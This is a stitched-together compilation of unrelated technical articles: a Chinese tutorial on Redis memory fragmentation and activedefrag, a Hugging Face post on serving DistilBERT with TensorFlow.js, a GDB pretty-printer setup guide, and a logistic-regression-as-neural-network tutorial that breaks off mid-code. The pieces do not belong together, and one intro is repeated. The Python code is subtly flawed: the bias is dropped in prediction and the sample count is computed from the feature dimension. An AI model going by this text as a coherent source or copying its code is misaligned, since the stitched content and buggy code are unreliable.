mem_fragmentation_ratio:内存碎片率,used_memory_rss / used_memory。大于1的部分为redis碎片占用的大小,建议值 大于 1 但小于 1.5,大于1.5说明碎片过多需要清理了。
需要注意的是,通常情况下 used_memory_rss 是大于 used_memory 的;但也有例外,当used_memory_rss 小于 used_memory 时,说明 操作系统分配给Redis进程的数据,不足以满足实际存储数据的需求,此时Redis部分内存数据会转换到Swap中,随之引发的问题是,当Redis访问Swap中的数据时,性能会下降 。
列出 Redis 服务器遇到的不同类型的内存相关问题,并提供相应的解决建议
127.0.0.1:6379> memory doctor
Hi Sam, I can't find any memory issue in your instance. I can only account for what occurs on this base.
提供内存分配情况的内部统计报表,(目前只支持jemalloc内存分配器)。通过该命令可以看出jemalloc对于所有对象进行分配时,各具体分区的内存详细状况。
memory malloc-stats 命令返回信息较多,此处暂不做详细分析,感兴趣的同学可以自行执行命令分析。
手动整理内存碎片,会阻塞主进程。
127.0.0.1:6379> memory purgeOK
以数组形式返回服务器的内存使用情况;
127.0.0.1:6379> memory stats
1) "peak.allocated"
2) (integer) 905331384
3) "total.allocated"
4) (integer) 905330152
5) "startup.allocated"
6) (integer) 791160
7) "replication.backlog"
8) (integer) 0
9) "clients.slaves"
10) (integer) 0
11) "clients.normal"
12) (integer) 49694
13) "aof.buffer"
14) (integer) 0
15) "lua.caches"
16) (integer) 0
17) "db.0"
18) 1) "overhead.hashtable.main"
2) (integer) 7888
3) "overhead.hashtable.expires"
4) (integer) 32
19) "db.1"
20) 1) "overhead.hashtable.main"
2) (integer) 304
3) "overhead.hashtable.expires"
4) (integer) 32
21) "overhead.total"
22) (integer) 849110
23) "keys.count"
24) (integer) 152
25) "keys.bytes-per-key"
26) (integer) 5950914
27) "dataset.bytes"
28) (integer) 904481042
29) "dataset.percentage"
30) "99.99359130859375"
31) "peak.percentage"
32) "99.999870300292969"
33) "allocator.allocated"
34) (integer) 905598528
35) "allocator.active"
36) (integer) 905961472
37) "allocator.resident"
38) (integer) 910348288
39) "allocator-fragmentation.ratio"
40) "1.0004007816314697"
41) "allocator-fragmentation.bytes"
42) (integer) 362944
43) "allocator-rss.ratio"
44) "1.0048421621322632"
45) "allocator-rss.bytes"
46) (integer) 4386816
47) "rss-overhead.ratio"
48) "0.0086568007245659828"
49) "rss-overhead.bytes"
50) (integer) -902467584
51) "fragmentation"
52) "0.0087051792070269585"
53) "fragmentation.bytes"
54) (integer) -897408432
返回一个key和它值在内存中占用的字节数(包含redis管理该key所占用的内存);
127.0.0.1:6379> memory usage key1
(integer) 46
memory相关命令的帮助信息;
127.0.0.1:6379> memory help
1) MEMORY <subcommand> arg arg ... arg. Subcommands are:
2) DOCTOR - Return memory problems reports.
3) MALLOC-STATS -- Return internal statistics report from the memory allocator.
4) PURGE -- Attempt to purge dirty pages for reclamation by the allocator.
5) STATS -- Return information about the memory usage of the server.
6) USAGE <key> [SAMPLES <count>] -- Return memory in bytes used by <key> and its value. Nested values are sampled up to <count> times (default: 5).
Redis有自己的内存分配器,当数据删除后,释放的内存空间由Redis自己的内存分配器管理,并没有立即将内存返回给操作系统,所以对于操作系统而言,仍然认为Redis占用了内存。
这样的好处是,减少Redis向系统申请内存分配的次数,提升Redis自身性能。
不少同学应该听说过磁盘碎片,使用过Smart Defrag等软件清理过磁盘碎片,清理磁盘碎片能够优化文件系统,将零散的磁盘空间移动合并,将频繁使用的文件和目录放置到磁盘的速度最快的区域,使计算机能以最高速度稳定运行。
内存碎片是由于计划申请的空间比空闲的连续空间小,导致这部分小内存空间无法被使用,无法被使用的内存空间则可称为内存碎片。
如图,9字节的内存空间示意图,序号为1、2、3、5、6、9的内存空间已使用,如果现在计划申请3字节的连续内存空间,按照现有的内存使用情况是无法申请的,此时序号4、7、8就是“内存碎片”了。
Redis产生内存碎片主要由以下2点原因导致;
内存分配器机制;
Redis数据的修改和删除引发空间的扩容和释放;
Redis有几种内存分配器 jemalloc、libc、tcmalloc,默认使用 jemalloc。
jemalloc 内存分配方式为 按照一系列固定大小分配内存空间,jemalloc 按照申请的内存大小分配最接近的内存空间;
比如申请220字节,jemalloc 会分配256字节,如果还要继续写入20字节,Redis则不会继续向系统申请内存空间,因为先前申请的256字节还剩余36字节可用;但如果此时需要继续写入60字节,则已分配空间不够用了,需要再次向系统申请分配内存空间。
默认64位系统jemalloc的划分方式如下:
Small: [8], [16, 32, 48, …, 128], [192, 256, 320, …, 512], [768, 1024, 1280, …, 3840]
Large: [4 KiB, 8 KiB, 12 KiB, …, 4072 KiB]
Huge: [4 MiB, 8 MiB, 12 MiB, …]
如下图所示,key1扩容时需新增2字节,为保证内存空间连续性,key2发生迁移;当key3释放空间后,序号为7、8、14、15的空间均未使用。
如果此时有key希望申请3字节的空间,虽然总共剩余了4字节,但是没有连续的3字节空间,所以无法直接使用。
了解了原理后,如果我们想测试内存碎片清理,则可以插入大量key,再删除大量key(或者插入key时设置过期时间),以此来模拟高内存碎片率场景。
这应该是最直接有效的方法。但是生产环境不是你想重启就能重启的。因为重启Redis需要考虑很多问题,比如:
重启时加载恢复数据需要时间,在此期间Redis将不可用;
确保所有的配置项变更都更新到redis.conf,否则重启后在线修改的配置将还原;
内存碎片的产生很大程度上是因为数据的修改和删除,所以计划清理 实例A的内存碎片时,我们可以引入实例B,将实例A的数据全量同步到实例B中,再使用实例B替换原有的实例A对外提供服务。
此方法思路虽然是通的,但操作流程复杂且风险较高,生产环境几乎不会采用。但如果本就计划迁移实例,那就刚好可以采用此种思路。
手动整理内存碎片,会阻塞主进程,生产环境慎用。
memory purge 和 activedefrag回收的并不是同一块区域的内存,它简单粗暴的尝试清除脏页以便内存分配器回收。可以根据实际情况和activedefrag配合使用,memory purge在极端情况下效果较好,activedefrag则更彻底。
在Redis 4.0 版本后新增配置项activedefrag(active:主动的,defrag:整理碎片),activedefrag默认关闭,计划清理碎片时需手动开启,命令如下:
127.0.0.1:6379> config set activedefrag yes
让我们看看相关的配置文件:
# 以下内容节选至 redis.conf
########################### ACTIVE DEFRAGMENTATION #######################
# 3. Once you experience fragmentation, you can enable this feature when
# needed with the command "CONFIG SET activedefrag yes".
#
# Enabled active defragmentation
# activedefrag yes
# Minimum amount of fragmentation waste to start active defrag
# active-defrag-ignore-bytes 100mb
# Minimum percentage of fragmentation to start active defrag
# active-defrag-threshold-lower 10
# Maximum percentage of fragmentation at which we use maximum effort
# active-defrag-threshold-upper 100
# Minimal effort for defrag in CPU percentage
# active-defrag-cycle-min 5
# Maximal effort for defrag in CPU percentage
# active-defrag-cycle-max 75
# Maximum number of set/hash/zset/list fields that will be processed from
# the main dictionary scan
# active-defrag-max-scan-fields 1000
内存碎片整理开关(需同时满足才执行):
activedefrag:内存碎片整理总开关,开启后才有可能执行碎片整理;
active-defrag-ignore-bytes:内存碎片的字节数达到此阀值(默认100MB)时,允许整理;
active-defrag-threshold-lower:内存碎片空间占操作系统分配给 Redis 的总空间比例达到此阀值(默认10%)时,允许整理;
此外,还有几个参数用于控制内存碎片整理的力度:
active-defrag-cycle-min:清理内存碎片占用 CPU 时间的比例不低于此阀值(默认5%),保证清理能正常开展;
active-defrag-cycle-max:清理内存碎片占用CPU 时间的比例不高于此阀值(默认75%),一旦超过则停止清理,从而避免在清理时,大量的内存拷贝阻塞 Redis,导致其他请求延迟。
内存碎片整理其他参数:
active-defrag-threshold-upper:内存碎片空间占操作系统分配给 Redis 的总空间比例达到此阀值(默认100%)时,则尽最大努力整理;
active-defrag-max-scan-fields:碎片整理 扫描set/hash/zset/list时,仅当 set/hash/zset/list 的长度小于此阀值时,才会将此key加入碎片整理;
通过“info memory”命令查看mem_fragmentation_ratio(内存碎片率),当mem_fragmentation_ratio > 1.5 时,建议开始清理内存碎片。当然,也可以通过分析调整activedefrag的参数配置从而达到自动清理效果。
memory purge:手动整理内存碎片,会阻塞主进程,生产环境慎用,清理效果和activedefrag并不相同。
activedefrag:自动整理内存碎片,其原理是通过scan迭代整个Redis数据,通过一系列的内存复制、转移操作完成内存碎片整理,由于此操作使用的是主线程,故会影响Redis对其他请求的响应。
在Redis日志中,可以查看activedefrag耗时及资源占用记录:Active defrag done in 79214ms 表示 耗时,但此耗时并不是阻塞了主线程的时间,而是从内存碎片整理的第一次scan到最后一次scan的时间差,在此期间,主线程是可以处理其他请求的。
12:M 21 May 12:31:11.210 - Starting active defrag, frag=12%, frag_bytes=381401201, cpu=75%
12:M 21 May 12:32:30.424 - Active defrag done in 79214ms, reallocated=50, frag=12%, frag_bytes=380061210
【玩转Redis系列文章 近期精选 @zxiaofan】
|
May 18, 2020 — A guest post by Hugging Face: Pierric Cistac, Software Engineer; Victor Sanh, Scientist; Anthony Moi, Technical Lead.
Hugging Face 🤗 is an AI startup with the goal of contributing to Natural Language Processing (NLP) by developing tools to improve collaboration in the community, and by being an active part of research efforts.
Because NLP is a difficult field, we believe that solving it is only …
NLP models through time, with their number of parameters
With t the logits from the teacher and s the logits of the student
tf.function to do so:
import tensorflow as tf
from transformers import TFDistilBertForQuestionAnswering
distilbert = TFDistilBertForQuestionAnswering.from_pretrained('distilbert-base-cased-distilled-squad')
callable = tf.function(distilbert.call)
Here we passed to
tf.function the function called in our Keras model, call. What we get in return is a get_concrete_function:
concrete_function = callable.get_concrete_function([tf.TensorSpec([None, 384], tf.int32, name="input_ids"), tf.TensorSpec([None, 384], tf.int32, name="attention_mask")])
By calling
get_concrete_function, we trace-compile the TensorFlow operations of the model for an input signature composed of two Tensors of shape [None, 384], the first one being the input ids and the second one the attention mask.
tf.saved_model.save(distilbert, 'distilbert_cased_savedmodel', signatures=concrete_function)
A conversion in 4 lines of code, thanks to TensorFlow! We can check that our resulting SavedModel contains the correct signature by using the
saved_model_cli:$ saved_model_cli show --dir distilbert_cased_savedmodel --tag_set serve --signature_def serving_defaultOutput:
The given SavedModel SignatureDef contains the following input(s):
inputs['attention_mask'] tensor_info:
dtype: DT_INT32
shape: (-1, 384)
name: serving_default_attention_mask:0
inputs['input_ids'] tensor_info:
dtype: DT_INT32
shape: (-1, 384)
name: serving_default_input_ids:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output_0'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 384)
name: StatefulPartitionedCall:0
outputs['output_1'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 384)
name: StatefulPartitionedCall:1
Method name is: tensorflow/serving/predict
Perfect! You can play with the conversion code yourself by opening this colab notebook. We are now ready to use our SavedModel with TensorFlow.js!
const model = await tf.node.loadSavedModel(path); // Load the model located in path
const result = tf.tidy(() => {
// ids and attentionMask are of type number[][]
const inputTensor = tf.tensor(ids, undefined, "int32");
const maskTensor = tf.tensor(attentionMask, undefined, "int32");
// Run model inference
return model.predict({
// “input_ids” and “attention_mask” correspond to the names specified in the signature passed to get_concrete_function during the model conversion
“input_ids”: inputTensor, “attention_mask”: maskTensor
}) as tf.NamedTensorMap;
});
// Extract the start and end logits from the tensors returned by model.predict
const [startLogits, endLogits] = await Promise.all([
result[“output_0"].squeeze().array() as Promise,
result[“output_1”].squeeze().array() as Promise
]);
tf.dispose(result); // Clean up memory used by the result tensor since we don’t need it anymore
Note the use of the very helpful TensorFlow.js function
tf.tidy, which takes care of automatically cleaning up intermediate tensors like inputTensor and maskTensor while returning the result of the model inference."ouput_0" and "output_1" to extract the start and end logits (beginning and end of the possible spans answering the question) from the result returned by the model? We just have to look at the output names indicated by the saved_model_cli command we ran previously after exporting to SavedModel.
const tokenizer = await BertWordPieceTokenizer.fromOptions({
vocabFile: vocabPath, lowercase: false
});
tokenizer.setPadding({ maxLength: 384 }); // 384 matches the shape of the signature input provided while exporting to SavedModel
// Here question and context are in their original string format
const encoding = await tokenizer.encode(question, context);
const { ids, attentionMask } = encoding;
That’s it! In just 4 lines of code, we are able to convert the user input to a format we can then use to feed our model with TensorFlow.js.
import { QAClient } from "question-answering"; // If using Typescript or Babel
// const { QAClient } = require("question-answering"); // If using vanilla JS
const text = `
Super Bowl 50 was an American football game to determine the champion of the National Football League (NFL) for the 2015 season.
The American Football Conference (AFC) champion Denver Broncos defeated the National Football Conference (NFC) champion Carolina Panthers 24–10 to earn their third Super Bowl title. The game was played on February 7, 2016, at Levi's Stadium in the San Francisco Bay Area at Santa Clara, California.
As this was the 50th Super Bowl, the league emphasized the "golden anniversary" with various gold-themed initiatives, as well as temporarily suspending the tradition of naming each Super Bowl game with Roman numerals (under which the game would have been known as "Super Bowl L"), so that the logo could prominently feature the Arabic numerals 50.
`;
const question = "Who won the Super Bowl?";
const qaClient = await QAClient.fromOptions();
const answer = await qaClient.predict(question, text);
console.log(answer); // { text: 'Denver Broncos', score: 0.3 }
Powerful? Yes! Thanks to the native support of SavedModel format in TensorFlow.js, we get very good performances: here is a benchmark comparing our Node.js package and our popular transformers Python library, running the same DistilBERT-cased-squad model. As you can see, we achieve a 2X speed gain! Who said Javascript was slow?
Short texts are texts between 500 and 1000 characters, long texts are between 4000 and 5000 characters. You can check the Node.js benchmark script here (the Python one is equivalent). Benchmark run on a standard 2019 MacBook Pro running on macOS 10.15.2.
May 18, 2020 — A guest post by Hugging Face: Pierric Cistac, Software Engineer; Victor Sanh, Scientist; Anthony Moi, Technical Lead.
Hugging Face 🤗 is an AI startup with the goal of contributing to Natural Language Processing (NLP) by developing tools to improve collaboration in the community, and by being an active part of research efforts.
Because NLP is a difficult field, we believe that solving it is only …
|
Friendly GDB
The gdb debugger is a very old application, used widely in the past, when acomputer was not yet a part of every house's inventory. Contrary to what manypeople say, it's very usable even today, mainly because of its extensibility,which lets the user to adapt it to his/hers specific needs.
It's quite easy to add custom renderers to gdb. They are a piece of codethat convert data types into human readable form, so it's easy to understandgiven type by just looking at the data dump.
Here is an example data dump of the QString structure (it's a container forstrings in the Qt Framework), created by using the print command:
As you can see, you can't see much ;). Maybe this kind of information is usefulfor a Qt developer, which is debugging the functionality of QString structure,but our case is completely different. The solution for this problem is to tellgdb what kind of information we seek and make it display only these fieldswhich match our interest.
The first step is to acquire the Qt renderer pack. You can get it from i.e. KDevelop'srepository. It was written by Niko Sams, and it definitely does the job well. Wehave to use the qt4.py file, which contains the code to convert raw structuredump into more eye-friendly notation. As you can also probably see, the samedirectory in the repository also contains another file named libstdcxx.pywhich does the same thing for classes from std library (standard C++ library),like std::string, std::map, and others. These files can be copied into anydirectory. For example, here seems to be a good spot for it:/usr/share/gdb/auto-load/usr/lib.
Step two is to create the ~/.gdbinit file. It will be automatically loadedduring every invocation of gdb. Here's what you can put into it:
python
import sys
sys.path.insert(0, '/usr/share/gdb/auto-load/usr/lib')
from qt4 import register_qt4_printers
from libstdcxx import register_libstdcxx_printers
register_qt4_printers(None)
register_libstdcxx_printers(None)
end
set auto-load local-gdbinit on
set print pretty 1
set auto-load safe-path /usr/share/gdb/auto-load
If you'll get errors after invoking gdb, you may want to check if:
Your path is correct, contains both .pyfiles (qt4.pyandlibstdcxx.py),
The python interpreter is correctly configured (is it v2.7? or maybe v3.0?),
You can also review your security settings related to initialization script path whitelisting ({SafePath}[related link]).
If no errors will occur, the next time you will use print command on asupported data type, it will display something that is more friendly than everbefore:
Much better! Other examples:
Example 1
Without printers:
(gdb) p strings
$1 = {
_M_t = {
_M_impl = {
<std::allocator<std::_Rb_tree_node<std::pair<QString const, int> > >> = {
<__gnu_cxx::new_allocator<std::_Rb_tree_node<std::pair<QString const, int> > >> = {<No data fields>}, <No data fields>},
members of std::_Rb_tree<QString, std::pair<QString const, int>, std::_Select1st<std::pair<QString const, int> >, std::less<QString>, std::allocator<std::pair<QString const, int> > >::_Rb_tree_impl<std::less<QString>, false>:
_M_key_compare = {
<std::binary_function<QString, QString, bool>> = {<No data fields>}, <No data fields>},
_M_header = {
_M_color = std::_S_red,
_M_parent = 0x6040c0,
_M_left = 0x604050,
_M_right = 0x604140
},
_M_node_count = 3
}
}
}
With printers:
(gdb) p strings
$1 = std::map with 3 elements = {
["hello world"] = 1,
["test"] = 2,
["test2"] = 3
}
Example 2
Without printers:
(gdb) p v
$1 = {
<std::_Vector_base<int, std::allocator<int> >> = {
_M_impl = {
<std::allocator<int>> = {
<__gnu_cxx::new_allocator<int>> = {<No data fields>}, <No data fields>},
members of std::_Vector_base<int, std::allocator<int> >::_Vector_impl:
_M_start = 0x6051c0,
_M_finish = 0x6051cc,
_M_end_of_storage = 0x6051d0
}
}, <No data fields>}
With printers:
(gdb) p v
$1 = std::vector of length 3, capacity 4 = {1, 2, 3}
Example 3
Without printers:
(gdb) p strmap
$1 = {
{
d = 0x6061f0,
e = 0x6061f0
}
}
With printers:
(gdb) p strmap
$1 = QMap<std::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::basic_string<char, std::char_traits<char>, std::allocator<char> >> = {
["a"] = "b",
["b"] = "c",
["c"] = "d"
}
Conclusion
Okay, the last part could be better (more condensed), but having the access to the source code you can just fix it for yourself. And still it's better than the un-friendly version!
|
“You don’t perceive objects as they are. You perceive them as you are.”
“Your interpretation of physical objects has everything to do with the historical trajectory of your brain – and little to do with the objects themselves.”
“The brain generates its own reality, even before it receives information coming in from the eyes and the other senses. This is known as the internal model”
David Eagleman - The Brain: The Story of You
This is the first in the series of posts, I intend to write on Deep Learning. This post is inspired by the Deep Learning Specialization by Prof Andrew Ng on Coursera and Neural Networks for Machine Learning by Prof Geoffrey Hinton also on Coursera. In this post I implement Logistic regression with a 2 layer Neural Network i.e. a Neural Network that just has an input layer and an output layer and with no hidden layer.I am certain that any self-respecting Deep Learning/Neural Network would consider a Neural Network without hidden layers as no Neural Network at all!
This 2 layer network is implemented in Python, R and Octave languages. I have included Octave, into the mix, as Octave is a close cousin of Matlab. These implementations in Python, R and Octave are equivalent vectorized implementations. So, if you are familiar in any one of the languages, you should be able to look at the corresponding code in the other two. You can download this R Markdown file and Octave code from DeepLearning -Part 1
Check out my video presentation which discusses the derivations in detail
1. Elements of Neural Networks and Deep Le- Part 1
2. Elements of Neural Networks and Deep Learning – Part 2
To start with, Logistic Regression is performed using sklearn’s logistic regression package for the cancer data set also from sklearn. This is shown below
1. Logistic Regression
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.datasets import make_classification, make_blobs
from sklearn.metrics import confusion_matrix
from matplotlib.colors import ListedColormap
from sklearn.datasets import load_breast_cancer
# Load the cancer data
(X_cancer, y_cancer) = load_breast_cancer(return_X_y = True)
X_train, X_test, y_train, y_test = train_test_split(X_cancer, y_cancer,
random_state = 0)
# Call the Logisitic Regression function
clf = LogisticRegression().fit(X_train, y_train)
print('Accuracy of Logistic regression classifier on training set: {:.2f}'
.format(clf.score(X_train, y_train)))
print('Accuracy of Logistic regression classifier on test set: {:.2f}'
.format(clf.score(X_test, y_test)))
## Accuracy of Logistic regression classifier on training set: 0.96 ## Accuracy of Logistic regression classifier on test set: 0.96
To check on other classification algorithms, check my post Practical Machine Learning with R and Python – Part 2.
Checkout my book ‘Deep Learning from first principles: Second Edition – In vectorized Python, R and Octave’. My book starts with the implementation of a simple 2-layer Neural Network and works its way to a generic L-Layer Deep Learning Network, with all the bells and whistles. The derivations have been discussed in detail. The code has been extensively commented and included in its entirety in the Appendix sections. My book is available on Amazon as paperback ($14.99) and in kindle version($9.99/Rs449).
You may also like my companion book “Practical Machine Learning with R and Python:Second Edition- Machine Learning in stereo” available in Amazon in paperback($10.99) and Kindle($7.99/Rs449) versions. This book is ideal for a quick reference of the various ML functions and associated measurements in both R and Python which are essential to delve deep into Deep Learning.
2. Logistic Regression as a 2 layer Neural Network
In the following section Logistic Regression is implemented as a 2 layer Neural Network in Python, R and Octave. The same cancer data set from sklearn will be used to train and test the Neural Network in Python, R and Octave. This can be represented diagrammatically as below
The cancer data set has 30 input features, and the target variable ‘output’ is either 0 or 1. Hence the sigmoid activation function will be used in the output layer for classification.
This simple 2 layer Neural Network is shown below
At the input layer there are 30 features and the corresponding weights of these inputs which are initialized to small random values.
where ‘b’ is the bias term
The Activation function is the sigmoid function which is
The Loss, when the sigmoid function is used in the output layer, is given by
(1)
Gradient Descent
Forward propagation
In forward propagation cycle of the Neural Network the output Z and the output of activation function, the sigmoid function, is first computed. Then using the output ‘y’ for the given features, the ‘Loss’ is computed using equation (1) above.
Backward propagation
The backward propagation cycle determines how the ‘Loss’ is impacted for small variations from the previous layers upto the input layer. In other words, backward propagation computes the changes in the weights at the input layer, which will minimize the loss. Several cycles of gradient descent are performed in the path of steepest descent to find the local minima. In other words the set of weights and biases, at the input layer, which will result in the lowest loss is computed by gradient descent. The weights at the input layer are decreased by a parameter known as the ‘learning rate’. Too big a ‘learning rate’ can overshoot the local minima, and too small a ‘learning rate’ can take a long time to reach the local minima. This is done for ‘m’ training examples.
Chain rule of differentiation
Let y=f(u)
and u=g(x) then
Derivative of sigmoid
Let then
Using the chain rule of differentiation we get
Therefore -(2)
The 3 equations for the 2 layer Neural Network representation of Logistic Regression are
-(a)
-(b)
-(c)
The back propagation step requires the computation of and . In the case of regression it would be and where dE is the Mean Squared Error function.
Computing the derivatives for back propagation we have
-(d)
because
Also from equation (2) we get
– (e)
By chain rule
therefore substituting the results of (d) & (e) we get
(f)
Finally
-(g)
– (h)
and from (f) we have
Therefore (g) reduces to
-(i)
Also
-(j)
Since
and using (f) in (j)
The gradient computes the weights at the input layer and the corresponding bias by using the values
of and
I found the computation graph representation in the book Deep Learning: Ian Goodfellow, Yoshua Bengio, Aaron Courville, very useful to visualize and also compute the backward propagation. For the 2 layer Neural Network of Logistic Regression the computation graph is shown below
3. Neural Network for Logistic Regression -Python code (vectorized)
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
# Define the sigmoid function
def sigmoid(z):
a=1/(1+np.exp(-z))
return a
# Initialize
def initialize(dim):
w = np.zeros(dim).reshape(dim,1)
b = 0
return w
# Compute the loss
def computeLoss(numTraining,Y,A):
loss=-1/numTraining *np.sum(Y*np.log(A) + (1-Y)*(np.log(1-A)))
return(loss)
# Execute the forward propagation
def forwardPropagation(w,b,X,Y):
# Compute Z
Z=np.dot(w.T,X)+b
# Determine the number of training samples
numTraining=float(len(X))
# Compute the output of the sigmoid activation function
A=sigmoid(Z)
#Compute the loss
loss = computeLoss(numTraining,Y,A)
# Compute the gradients dZ, dw and db
dZ=A-Y
dw=1/numTraining*np.dot(X,dZ.T)
db=1/numTraining*np.sum(dZ)
# Return the results as a dictionary
gradients = {"dw": dw,
"db": db}
loss = np.squeeze(loss)
return gradients,loss
# Compute Gradient Descent
def gradientDescent(w, b, X, Y, numIerations, learningRate):
losses=[]
idx =[]
# Iterate
for i in range(numIerations):
gradients,loss=forwardPropagation(w,b,X,Y)
#Get the derivates
dw = gradients["dw"]
db = gradients["db"]
w = w-learningRate*dw
b = b-learningRate*db
# Store the loss
if i % 100 == 0:
idx.append(i)
losses.append(loss)
# Set params and grads
params = {"w": w,
"b": b}
grads = {"dw": dw,
"db": db}
return params, grads, losses,idx
# Predict the output for a training set
def predict(w,b,X):
size=X.shape[1]
yPredicted=np.zeros((1,size))
Z=np.dot(w.T,X)
# Compute the sigmoid
A=sigmoid(Z)
for i in range(A.shape[1]):
#If the value is > 0.5 then set as 1
if(A[0][i] > 0.5):
yPredicted[0][i]=1
else:
# Else set as 0
yPredicted[0][i]=0
return yPredicted
#Normalize the data
def normalize(x):
x_norm = None
x_norm = np.linalg.norm(x,axis=1,keepdims=True)
x= x/x_norm
return x
# Run the 2 layer Neural Network on the cancer data set
from sklearn.datasets import load_breast_cancer
# Load the cancer data
(X_cancer, y_cancer) = load_breast_cancer(return_X_y = True)
# Create train and test sets
X_train, X_test, y_train, y_test = train_test_split(X_cancer, y_cancer,
random_state = 0)
# Normalize the data for better performance
X_train1=normalize(X_train)
# Create weight vectors of zeros. The size is the number of features in the data set=30
w=np.zeros((X_train.shape[1],1))
#w=np.zeros((30,1))
b=0
#Normalize the training data so that gradient descent performs better
X_train1=normalize(X_train)
#Transpose X_train so that we have a matrix as (features, numSamples)
X_train2=X_train1.T
# Reshape to remove the rank 1 array and then transpose
y_train1=y_train.reshape(len(y_train),1)
y_train2=y_train1.T
# Run gradient descent for 4000 times and compute the weights
parameters, grads, costs,idx = gradientDescent(w, b, X_train2, y_train2, numIerations=4000, learningRate=0.75)
w = parameters["w"]
b = parameters["b"]
# Normalize X_test
X_test1=normalize(X_test)
#Transpose X_train so that we have a matrix as (features, numSamples)
X_test2=X_test1.T
#Reshape y_test
y_test1=y_test.reshape(len(y_test),1)
y_test2=y_test1.T
# Predict the values for
yPredictionTest = predict(w, b, X_test2)
yPredictionTrain = predict(w, b, X_train2)
# Print the accuracy
print("train accuracy: {} %".format(100 - np.mean(np.abs(yPredictionTrain - y_train2)) * 100))
print("test accuracy: {} %".format(100 - np.mean(np.abs(yPredictionTest - y_test)) * 100))
# Plot the Costs vs the number of iterations
fig1=plt.plot(idx,costs)
fig1=plt.title("Gradient descent-Cost vs No of iterations")
fig1=plt.xlabel("No of iterations")
fig1=plt.ylabel("Cost")
fig1.figure.savefig("fig1", bbox_inches='tight')
## train accuracy: 90.3755868545 % ## test accuracy: 89.5104895105 %
Note: It can be seen that the Accuracy on the training and test set is 90.37% and 89.51%. This is comparatively poorer than the 96% which the logistic regression of sklearn achieves! But this is mainly because of the absence of hidden layers which is the real power of neural networks.
4. Neural Network for Logistic Regression -R code (vectorized)
source("RFunctions-1.R")
# Define the sigmoid function
sigmoid <- function(z){
a <- 1/(1+ exp(-z))
a
}
# Compute the loss
computeLoss <- function(numTraining,Y,A){
loss <- -1/numTraining* sum(Y*log(A) + (1-Y)*log(1-A))
return(loss)
}
# Compute forward propagation
forwardPropagation <- function(w,b,X,Y){
# Compute Z
Z <- t(w) %*% X +b
#Set the number of samples
numTraining <- ncol(X)
# Compute the activation function
A=sigmoid(Z)
#Compute the loss
loss <- computeLoss(numTraining,Y,A)
# Compute the gradients dZ, dw and db
dZ<-A-Y
dw<-1/numTraining * X %*% t(dZ)
db<-1/numTraining*sum(dZ)
fwdProp <- list("loss" = loss, "dw" = dw, "db" = db)
return(fwdProp)
}
# Perform one cycle of Gradient descent
gradientDescent <- function(w, b, X, Y, numIerations, learningRate){
losses <- NULL
idx <- NULL
# Loop through the number of iterations
for(i in 1:numIerations){
fwdProp <-forwardPropagation(w,b,X,Y)
#Get the derivatives
dw <- fwdProp$dw
db <- fwdProp$db
#Perform gradient descent
w = w-learningRate*dw
b = b-learningRate*db
l <- fwdProp$loss
# Stoe the loss
if(i %% 100 == 0){
idx <- c(idx,i)
losses <- c(losses,l)
}
}
# Return the weights and losses
gradDescnt <- list("w"=w,"b"=b,"dw"=dw,"db"=db,"losses"=losses,"idx"=idx)
return(gradDescnt)
}
# Compute the predicted value for input
predict <- function(w,b,X){
m=dim(X)[2]
# Create a ector of 0's
yPredicted=matrix(rep(0,m),nrow=1,ncol=m)
Z <- t(w) %*% X +b
# Compute sigmoid
A=sigmoid(Z)
for(i in 1:dim(A)[2]){
# If A > 0.5 set value as 1
if(A[1,i] > 0.5)
yPredicted[1,i]=1
else
# Else set as 0
yPredicted[1,i]=0
}
return(yPredicted)
}
# Normalize the matrix
normalize <- function(x){
#Create the norm of the matrix.Perform the Frobenius norm of the matrix
n<-as.matrix(sqrt(rowSums(x^2)))
#Sweep by rows by norm. Note '1' in the function which performing on every row
normalized<-sweep(x, 1, n, FUN="/")
return(normalized)
}
# Run the 2 layer Neural Network on the cancer data set
# Read the data (from sklearn)
cancer <- read.csv("cancer.csv")
# Rename the target variable
names(cancer) <- c(seq(1,30),"output")
# Split as training and test sets
train_idx <- trainTestSplit(cancer,trainPercent=75,seed=5)
train <- cancer[train_idx, ]
test <- cancer[-train_idx, ]
# Set the features
X_train <-train[,1:30]
y_train <- train[,31]
X_test <- test[,1:30]
y_test <- test[,31]
# Create a matrix of 0's with the number of features
w <-matrix(rep(0,dim(X_train)[2]))
b <-0
X_train1 <- normalize(X_train)
X_train2=t(X_train1)
# Reshape then transpose
y_train1=as.matrix(y_train)
y_train2=t(y_train1)
# Perform gradient descent
gradDescent= gradientDescent(w, b, X_train2, y_train2, numIerations=3000, learningRate=0.77)
# Normalize X_test
X_test1=normalize(X_test)
#Transpose X_train so that we have a matrix as (features, numSamples)
X_test2=t(X_test1)
#Reshape y_test and take transpose
y_test1=as.matrix(y_test)
y_test2=t(y_test1)
# Use the values of the weights generated from Gradient Descent
yPredictionTest = predict(gradDescent$w, gradDescent$b, X_test2)
yPredictionTrain = predict(gradDescent$w, gradDescent$b, X_train2)
sprintf("Train accuracy: %f",(100 - mean(abs(yPredictionTrain - y_train2)) * 100))
## [1] "Train accuracy: 90.845070"
sprintf("test accuracy: %f",(100 - mean(abs(yPredictionTest - y_test)) * 100))
## [1] "test accuracy: 87.323944"
df <-data.frame(gradDescent$idx, gradDescent$losses)
names(df) <- c("iterations","losses")
ggplot(df,aes(x=iterations,y=losses)) + geom_point() + geom_line(col="blue") +
ggtitle("Gradient Descent - Losses vs No of Iterations") +
xlab("No of iterations") + ylab("Losses")
4. Neural Network for Logistic Regression -Octave code (vectorized)
1;
# Define sigmoid function
function a = sigmoid(z)
a = 1 ./ (1+ exp(-z));
end
# Compute the loss
function loss=computeLoss(numtraining,Y,A)
loss = -1/numtraining * sum((Y .* log(A)) + (1-Y) .* log(1-A));
end
# Perform forward propagation
function [loss,dw,db,dZ] = forwardPropagation(w,b,X,Y)
% Compute Z
Z = w' * X + b;
numtraining = size(X)(1,2);
# Compute sigmoid
A = sigmoid(Z);
#Compute loss. Note this is element wise product
loss =computeLoss(numtraining,Y,A);
# Compute the gradients dZ, dw and db
dZ = A-Y;
dw = 1/numtraining* X * dZ';
db =1/numtraining*sum(dZ);
end
# Compute Gradient Descent
